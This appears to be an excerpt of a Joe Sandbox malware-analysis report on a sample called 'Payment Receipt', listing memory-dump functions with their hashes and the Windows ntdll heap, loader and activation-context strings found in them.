                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015E0D74
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 1404860816-0
                                                                      • Opcode ID: fb64568e1866b5cd3d2ae65221675fb209b5b938173a5d378c94b8b9d6a3414d
                                                                      • Instruction ID: 3d536ab001ed9443aeb783f88d6b6cf37ffd75c2e57e9dc2e5ed4b96e5e8374d
                                                                      • Opcode Fuzzy Hash: fb64568e1866b5cd3d2ae65221675fb209b5b938173a5d378c94b8b9d6a3414d
                                                                      • Instruction Fuzzy Hash: B9427B71A00716DFDB25CF28C894BAAB7F5FF44304F0485A9E989EB245D770AA85CF60
                                                                      Function 01624F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                      • API String ID: 0-2518169356
                                                                      • Opcode ID: 6aed8832c08bbbb4c30efd5614b673b49308206525c463ac4ea3aa627a26152d
                                                                      • Instruction ID: ff2ecde1334b59aa0fe614c132f88e12bd9271a48b4854603e0f86c41893e937
                                                                      • Opcode Fuzzy Hash: 6aed8832c08bbbb4c30efd5614b673b49308206525c463ac4ea3aa627a26152d
                                                                      • Instruction Fuzzy Hash: BC918E72D00A2A9BCB25CF5CCC85AEEB7B1FF88310B5541A9E915EB350D735D901CB91
                                                                      Function 015B70C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                      • API String ID: 0-3178619729
                                                                      • Opcode ID: f13a8cbed22d6a3aed54d35a121f9b24bedaa4f2f95c90b48ec4549d62db311e
                                                                      • Instruction ID: 18b4ee09c5f8d92eda2e2fd6541de07df77f10f249786d33c72f79d6bab3490c
                                                                      • Opcode Fuzzy Hash: f13a8cbed22d6a3aed54d35a121f9b24bedaa4f2f95c90b48ec4549d62db311e
                                                                      • Instruction Fuzzy Hash: 31138B70A006569FDB25CF68C8907EDBBF5BF88304F1885A9D949AF381D734A945CF90
                                                                      Function 015BA840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 01607D03
                                                                      • SsHd, xrefs: 015BA885
                                                                      • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 01607D39
                                                                      • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 01607D56
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                      • API String ID: 0-2905229100
                                                                      • Opcode ID: 8917ab187a016d3ddabad8622ab526ff3a69cb241711d0d3a084e2dc99285e4c
                                                                      • Instruction ID: 47a1095b41563c43a924ce36d4590ccbb0c43354fdc672bef4dbd269bee4c650
                                                                      • Opcode Fuzzy Hash: 8917ab187a016d3ddabad8622ab526ff3a69cb241711d0d3a084e2dc99285e4c
                                                                      • Instruction Fuzzy Hash: 4BD18F36A0021A9FDB29CF98C8C06EDBBF5FF58710F15405AE945AF341D771A991CBA0
                                                                      Function 015AA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                      • API String ID: 0-379654539
                                                                      • Opcode ID: 36fe068063a2b9555505e2fa2149f07b27844c952971311730bb2663e0d66727
                                                                      • Instruction ID: 79865e975e0248c7da5083373ddda810ca3b69e3f3732b466848dad2097ae0b3
                                                                      • Opcode Fuzzy Hash: 36fe068063a2b9555505e2fa2149f07b27844c952971311730bb2663e0d66727
                                                                      • Instruction Fuzzy Hash: F8C19A705483828FDB26CF58C444B6EBBE4BF88704F44886EF9958B391E734C949CB56
                                                                      Function 015D8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • @, xrefs: 015D8591
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 015D8421
                                                                      • LdrpInitializeProcess, xrefs: 015D8422
                                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 015D855E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 0-1918872054
                                                                      • Opcode ID: bcb40d4c9584ebb7ad5a3677efa4261dea0b966195fff1666dda662bd2961d06
                                                                      • Instruction ID: fc847c9a09a9655ca4059d69a918008a1015da5b3c4d0e050a81b75973170d5e
                                                                      • Opcode Fuzzy Hash: bcb40d4c9584ebb7ad5a3677efa4261dea0b966195fff1666dda662bd2961d06
                                                                      • Instruction Fuzzy Hash: 43918D71908346AFD722DF69CC81EAFBAECBF84744F44092EF6859A155E370D904CB62
                                                                      Function 015B0C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 016055AE
                                                                      • HEAP[%wZ]: , xrefs: 016054D1, 01605592
                                                                      • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 016054ED
                                                                      • HEAP: , xrefs: 016054E0, 016055A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                      • API String ID: 0-1657114761
                                                                      • Opcode ID: 71779bfe957f9bbd06dbe24651a4f5914c03dbefd4a8329b69a67bd198fd30f1
                                                                      • Instruction ID: a9c5b98fa3b61ae4298bc1c9eeaf9a3568df44badd74b1604e143539653f807f
                                                                      • Opcode Fuzzy Hash: 71779bfe957f9bbd06dbe24651a4f5914c03dbefd4a8329b69a67bd198fd30f1
                                                                      • Instruction Fuzzy Hash: 84A1AD3060064A9FDB29CF28C881BBBBBF1BF54714F188569E5968F6C2D734E845CB91
                                                                      Function 015D273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • SXS: %s() passed the empty activation context, xrefs: 016121DE
                                                                      • .Local, xrefs: 015D28D8
                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 016122B6
                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 016121D9, 016122B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                      • API String ID: 0-1239276146
                                                                      • Opcode ID: 695226ebd490745059eab16bb11d544d0d6c1621083d9400c760276f60e501eb
                                                                      • Instruction ID: 17c3fdf4364b5b3325387f7d12a03db770a253e373e5c13f50019e89384444df
                                                                      • Opcode Fuzzy Hash: 695226ebd490745059eab16bb11d544d0d6c1621083d9400c760276f60e501eb
                                                                      • Instruction Fuzzy Hash: 0AA1BB3190122A9BDB35CF68DC88BA9B7B1BF58354F2445EAD908AB355D7309EC1CF90
                                                                      Function 015D4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01613437
                                                                      • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0161342A
                                                                      • RtlDeactivateActivationContext, xrefs: 01613425, 01613432, 01613451
                                                                      • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01613456
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                      • API String ID: 0-1245972979
                                                                      • Opcode ID: 7aaaaafe0e2d057b2c8689a648979ba43fcec2387bd8811e9b14dfb389c175d2
                                                                      • Instruction ID: f5a3875438e9abaae3c5cc4e7968a23469c777ccd225d76eee40f468a59f0112
                                                                      • Opcode Fuzzy Hash: 7aaaaafe0e2d057b2c8689a648979ba43fcec2387bd8811e9b14dfb389c175d2
                                                                      • Instruction Fuzzy Hash: 936102326516129BDB32CF1CCC81B2AB7E5BF90B20F188529E9969F754D730E801CB91
                                                                      Function 015A64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01600FE5
                                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0160106B
                                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01601028
                                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 016010AE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                      • API String ID: 0-1468400865
                                                                      • Opcode ID: bfb35e05b06bef87eba0864c4813b3749242134e1d37a81b52484c4d81419f69
                                                                      • Instruction ID: 218e13f647e4866402be6c0ae333ac20cf2535a56aeb38f4c31df0680c333229
                                                                      • Opcode Fuzzy Hash: bfb35e05b06bef87eba0864c4813b3749242134e1d37a81b52484c4d81419f69
                                                                      • Instruction Fuzzy Hash: CB71C0B19043069FCB21DF18C884B9B7FE9BF99754F844469F9888F286D734D588CB92
                                                                      Function 015C245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0160A9A2
                                                                      • LdrpDynamicShimModule, xrefs: 0160A998
                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0160A992
                                                                      • apphelp.dll, xrefs: 015C2462
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 0-176724104
                                                                      • Opcode ID: 1fd6437b4458e27d2cbb8e91f75bc86b5ed9c9d455056f05d7bfb5d5efdf55bc
                                                                      • Instruction ID: 2375b99c124849885a5154be8cd810ff542f9e09fd8db5cda2bd906908186f34
                                                                      • Opcode Fuzzy Hash: 1fd6437b4458e27d2cbb8e91f75bc86b5ed9c9d455056f05d7bfb5d5efdf55bc
                                                                      • Instruction Fuzzy Hash: B7312871610302ABDB369FEDDD85A6EB7B9FB80B44F16001DE9016F385C7705892C790
                                                                      Function 015B29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • HEAP[%wZ]: , xrefs: 015B3255
                                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 015B327D
                                                                      • HEAP: , xrefs: 015B3264
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                      • API String ID: 0-617086771
                                                                      • Opcode ID: b7a25ade2aeb49265009fa455005297e4063b9814768586b2a64b434f6c6e948
                                                                      • Instruction ID: cc8986532be024797f131071bf7b62554e83da0fb6607f40ce869ee215a02b67
                                                                      • Opcode Fuzzy Hash: b7a25ade2aeb49265009fa455005297e4063b9814768586b2a64b434f6c6e948
                                                                      • Instruction Fuzzy Hash: FF929A71A046499FDB25CF68C8847EEBBF1FF48300F188499E859AF291D735A945CF60
                                                                      Function 016302C0 Relevance: 4.4, Strings: 3, Instructions: 611COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: """"$MitigationAuditOptions$MitigationOptions
                                                                      • API String ID: 0-1670051934
                                                                      • Opcode ID: 1bb3225453679bc5f6cdd1335973a22302ca236370dae95d7143c61bc8161c17
                                                                      • Instruction ID: 18fad9a0dd9195b35e88a40e3debafb0f5b322bf0b0bc7cb5c86ed29c60f8132
                                                                      • Opcode Fuzzy Hash: 1bb3225453679bc5f6cdd1335973a22302ca236370dae95d7143c61bc8161c17
                                                                      • Instruction Fuzzy Hash: AF227E72A047029FE724CF2DCD9162ABBE1BBC4310F25892EF29A87794D771E549CB41
                                                                      Function 015B0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                      • API String ID: 0-4253913091
                                                                      • Opcode ID: 63ae19da1c96fffb46d639f8815719ccaacd4d21bfdccb835705352dd1c63e9f
                                                                      • Instruction ID: 4144466f2eaa0450e39489336a0de35149c286bb65d26989d0c854ef16ae5673
                                                                      • Opcode Fuzzy Hash: 63ae19da1c96fffb46d639f8815719ccaacd4d21bfdccb835705352dd1c63e9f
                                                                      • Instruction Fuzzy Hash: 2AF17830A00606DFEB2ACF68C894BABB7F5FF44704F1485A9E5169B391D734A981CF91
                                                                      Function 015A1460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • HEAP[%wZ]: , xrefs: 015A1712
                                                                      • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 015A1728
                                                                      • HEAP: , xrefs: 015A1596
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                      • API String ID: 0-3178619729
                                                                      • Opcode ID: d0112f75c26dc33da7c75f795a1506c552cb9b9b5f59f6582b6c31db6083c68a
                                                                      • Instruction ID: 92f26bd67183456a0a1e8ab2f4aa18823f3aa7b8b391e33a16ca2162d9155f75
                                                                      • Opcode Fuzzy Hash: d0112f75c26dc33da7c75f795a1506c552cb9b9b5f59f6582b6c31db6083c68a
                                                                      • Instruction Fuzzy Hash: 2BE1CF31A44A469BDB29CF6CC491A7EBBF1BF48300F58885EE596CF686D734E940CB50
                                                                      Function 015C6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $@
                                                                      • API String ID: 0-1077428164
                                                                      • Opcode ID: a4402739ccf5128ef30a0f87f727d7a60a17751f82a306fc6305f7ff46426195
                                                                      • Instruction ID: 2b552d2cf512e3a04d59eb3bedd4f9b897201497e2fa2a49e256a44c465e0325
                                                                      • Opcode Fuzzy Hash: a4402739ccf5128ef30a0f87f727d7a60a17751f82a306fc6305f7ff46426195
                                                                      • Instruction Fuzzy Hash: EEC28E716083419FD72ACF68C881BABBBE5BFC8B14F04896DE9898B341D774D905CB52
                                                                      Function 0159A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                      • API String ID: 0-2779062949
                                                                      • Opcode ID: fa96f6e1a8a591a0449cf534bf84bf0cf240d2904cdffcdb3cf770b675842ee7
                                                                      • Instruction ID: 994a23e8e7f9a7618b783e989dd0058f52ad67dbeadc075fbd0bdb6b81baab2c
                                                                      • Opcode Fuzzy Hash: fa96f6e1a8a591a0449cf534bf84bf0cf240d2904cdffcdb3cf770b675842ee7
                                                                      • Instruction Fuzzy Hash: A0A14B7591162A9BDF319F68CC88BAEB7B8FF44700F1041E9DA09AB250E7359E84CF50
                                                                      Function 015C0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0160A121
                                                                      • Failed to allocated memory for shimmed module list, xrefs: 0160A10F
                                                                      • LdrpCheckModule, xrefs: 0160A117
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 0-161242083
                                                                      • Opcode ID: 74fc4855f08eae96ce7c19236a405de759b19a901489591e53c9bd0397835093
                                                                      • Instruction ID: 1ab411b29e7713152905089d03af22332a38f4ef9938795809792b0ba7482769
                                                                      • Opcode Fuzzy Hash: 74fc4855f08eae96ce7c19236a405de759b19a901489591e53c9bd0397835093
                                                                      • Instruction Fuzzy Hash: 0A71BE75A00306DFDB2ADFA8CD85ABEB7F4FB84604F14446DE912AB391E734A941CB50
                                                                      Function 015B0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                      • API String ID: 0-1334570610
                                                                      • Opcode ID: 2c939e09984470785bc654750182346d7c0a79d05ae21be2c89d59ed56aa7a7f
                                                                      • Instruction ID: 7e5460b3be8e3ed3f1d1a6537adb136339439f57e9b0d45fcd23bfc45de055e2
                                                                      • Opcode Fuzzy Hash: 2c939e09984470785bc654750182346d7c0a79d05ae21be2c89d59ed56aa7a7f
                                                                      • Instruction Fuzzy Hash: 4D619E716003069FDB29CF28D880BABBBF5FF45704F148959E45A8F292D7B0E881CB95
                                                                      Function 015DC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 016182E8
                                                                      • Failed to reallocate the system dirs string !, xrefs: 016182D7
                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 016182DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 0-1783798831
                                                                      • Opcode ID: 4bab97c1d1ee8a7ba6c7385f60b6bfd8770ff7988f2f6bdbd5ed923070d7ad6e
                                                                      • Instruction ID: bc9878863b2af4399c441570474a139eff8628fda70c8778e01b1286979ce0d7
                                                                      • Opcode Fuzzy Hash: 4bab97c1d1ee8a7ba6c7385f60b6bfd8770ff7988f2f6bdbd5ed923070d7ad6e
                                                                      • Instruction Fuzzy Hash: F841BF71551312ABCB31EF69DC84B5B77ECBF88650F05492EB948DB294E770E810CB92
                                                                      Function 0165C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0165C1C5
                                                                      • PreferredUILanguages, xrefs: 0165C212
                                                                      • @, xrefs: 0165C1F1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                      • API String ID: 0-2968386058
                                                                      • Opcode ID: 2456875319e214b47dcb926c6b46ab439e8075f2c6570f3ce656f9946a6756e5
                                                                      • Instruction ID: b2c93ff6ea3b8c83dcbebc3dcf9b958b024f181c78175e32679a287affd448a6
                                                                      • Opcode Fuzzy Hash: 2456875319e214b47dcb926c6b46ab439e8075f2c6570f3ce656f9946a6756e5
                                                                      • Instruction Fuzzy Hash: 10417071E0030AEBDF55DAD8CC91BEEBBBCBB54744F14806AEA09B7240D7749A448B90
                                                                      Function 01634144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                      • API String ID: 0-1373925480
                                                                      • Opcode ID: 6831df71530d5ab50ff053ba2c354045e53dcc3e80aa9ed703295a9668d856a2
                                                                      • Instruction ID: 974da090420c15ad89fbc14ead1811cb92100df0ceb410ba7f8c3adadcf38e7f
                                                                      • Opcode Fuzzy Hash: 6831df71530d5ab50ff053ba2c354045e53dcc3e80aa9ed703295a9668d856a2
                                                                      • Instruction Fuzzy Hash: 1341CF32A006598FEB26DBA9CC44BADFBB9FF95340F14045AD901BF791DB758901CB50
                                                                      Function 01624755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01624899
                                                                      • LdrpCheckRedirection, xrefs: 0162488F
                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01624888
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                      • API String ID: 0-3154609507
                                                                      • Opcode ID: a7a49ee4160ccab096bb75be9b7b168026cfef67af1791fe96862da941a42a0a
                                                                      • Instruction ID: 30fdcd8ba1ef0d45ad7478fefecd4a439ff92a2604a535574f10bb9a30a07fc8
                                                                      • Opcode Fuzzy Hash: a7a49ee4160ccab096bb75be9b7b168026cfef67af1791fe96862da941a42a0a
                                                                      • Instruction Fuzzy Hash: BD41CF32A14B719BCB21CF68DC40A267BE9BF49B90B06056DED99DB351DB74D800CF91
                                                                      Function 015B0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                      • API String ID: 0-2558761708
